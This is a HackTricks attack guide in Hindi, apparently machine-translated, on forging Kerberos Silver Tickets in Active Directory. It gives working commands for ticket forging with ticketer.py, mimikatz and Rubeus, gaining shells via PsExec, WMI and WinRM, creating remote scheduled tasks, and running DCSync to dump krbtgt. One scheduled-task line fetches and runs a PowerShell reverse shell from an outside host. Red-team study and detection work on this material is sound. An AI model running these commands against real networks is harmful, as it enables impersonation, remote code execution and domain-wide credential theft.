Silver Ticket

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

Silver ticket

Silver Ticket हमला Active Directory (AD) वातावरण में सेवा टिकटों के शोषण से संबंधित है। यह विधि सेवा खाते का NTLM हैश प्राप्त करने पर निर्भर करती है, जैसे कि एक कंप्यूटर खाता, ताकि एक टिकट ग्रांटिंग सेवा (TGS) टिकट को forge किया जा सके। इस forged टिकट के साथ, एक हमलावर नेटवर्क पर विशिष्ट सेवाओं तक पहुँच सकता है, किसी भी उपयोगकर्ता का अनुकरण करते हुए, आमतौर पर प्रशासनिक विशेषाधिकारों के लिए लक्ष्य बनाते हुए। यह जोर दिया गया है कि टिकट forge करने के लिए AES कुंजियों का उपयोग करना अधिक सुरक्षित और कम पता लगाने योग्य है।

टिकट बनाने के लिए, विभिन्न उपकरणों का उपयोग किया जाता है जो ऑपरेटिंग सिस्टम के आधार पर होते हैं:

On Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Windows पर

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

The CIFS सेवा को पीड़ित की फ़ाइल प्रणाली तक पहुँचने के लिए एक सामान्य लक्ष्य के रूप में उजागर किया गया है, लेकिन HOST और RPCSS जैसी अन्य सेवाओं का भी कार्यों और WMI प्रश्नों के लिए शोषण किया जा सकता है।

उपलब्ध सेवाएँ

सेवा प्रकार

सेवा सिल्वर टिकट्स

WMI

HOST

RPCSS

PowerShell रिमोटिंग

HOST

HTTP

OS के आधार पर भी:

WSMAN

RPCSS

WinRM

HOST

HTTP

कुछ अवसरों पर आप बस पूछ सकते हैं: WINRM

अनुसूचित कार्य

HOST

Windows फ़ाइल शेयर, साथ ही psexec

CIFS

LDAP संचालन, जिसमें DCSync शामिल है

LDAP

Windows रिमोट सर्वर प्रशासन उपकरण

RPCSS

LDAP

CIFS

गोल्डन टिकट्स

krbtgt

Rubeus का उपयोग करके आप इन सभी टिकटों के लिए अनुरोध कर सकते हैं, इस पैरामीटर का उपयोग करते हुए:

/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

सिल्वर टिकट्स इवेंट आईडी

4624: खाता लॉगिन
4634: खाता लॉगआउट
4672: व्यवस्थापक लॉगिन

सेवा टिकटों का दुरुपयोग

निम्नलिखित उदाहरणों में कल्पना करें कि टिकट को व्यवस्थापक खाते का अनुकरण करते हुए पुनः प्राप्त किया गया है।

CIFS

इस टिकट के साथ आप SMB के माध्यम से C$ और ADMIN$ फ़ोल्डर तक पहुँचने में सक्षम होंगे (यदि वे उजागर हैं) और फ़ाइलों को दूरस्थ फ़ाइल प्रणाली के एक भाग में कॉपी कर सकते हैं, बस कुछ ऐसा करते हुए:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

आप होस्ट के अंदर एक शेल प्राप्त करने या psexec का उपयोग करके मनमाने आदेश निष्पादित करने में भी सक्षम होंगे:

PsExec/Winexec/ScExec

HOST

इस अनुमति के साथ आप दूरस्थ कंप्यूटरों में अनुसूचित कार्य उत्पन्न कर सकते हैं और मनमाने आदेश निष्पादित कर सकते हैं:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

HOST + RPCSS

इन टिकटों के साथ आप शिकार प्रणाली में WMI निष्पादित कर सकते हैं:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

wmiexec के बारे में अधिक जानकारी निम्नलिखित पृष्ठ पर खोजें:

WmiExec

HOST + WSMAN (WINRM)

winrm एक्सेस के साथ एक कंप्यूटर पर आप इसका उपयोग कर सकते हैं और यहां तक कि एक PowerShell प्राप्त कर सकते हैं:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

Check the following page to learn एक दूरस्थ होस्ट से winrm का उपयोग करके कनेक्ट करने के अधिक तरीके:

WinRM

ध्यान दें कि winrm को दूरस्थ कंप्यूटर पर सक्रिय और सुनने वाला होना चाहिए ताकि आप इसे एक्सेस कर सकें।

LDAP

With this privilege you can dump the DC database using DCSync:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

DCSync के बारे में अधिक जानें निम्नलिखित पृष्ठ पर:

संदर्भ

DCSync

बग बाउंटी टिप: साइन अप करें Intigriti के लिए, एक प्रीमियम बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा, हैकर्स के लिए बनाया गया है! आज ही https://go.intigriti.com/hacktricks पर हमारे साथ जुड़ें, और $100,000 तक की बाउंटी कमाना शुरू करें!

HackTricks का समर्थन करें

सदस्यता योजनाएँ देखें!
💬 Discord समूह या टेलीग्राम समूह में शामिल हों या Twitter 🐦 पर हमें फॉलो करें @hacktricks_live.**
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PR सबमिट करें।

PreviousSID-History Injection NextSkeleton Key

Last updated 3 days ago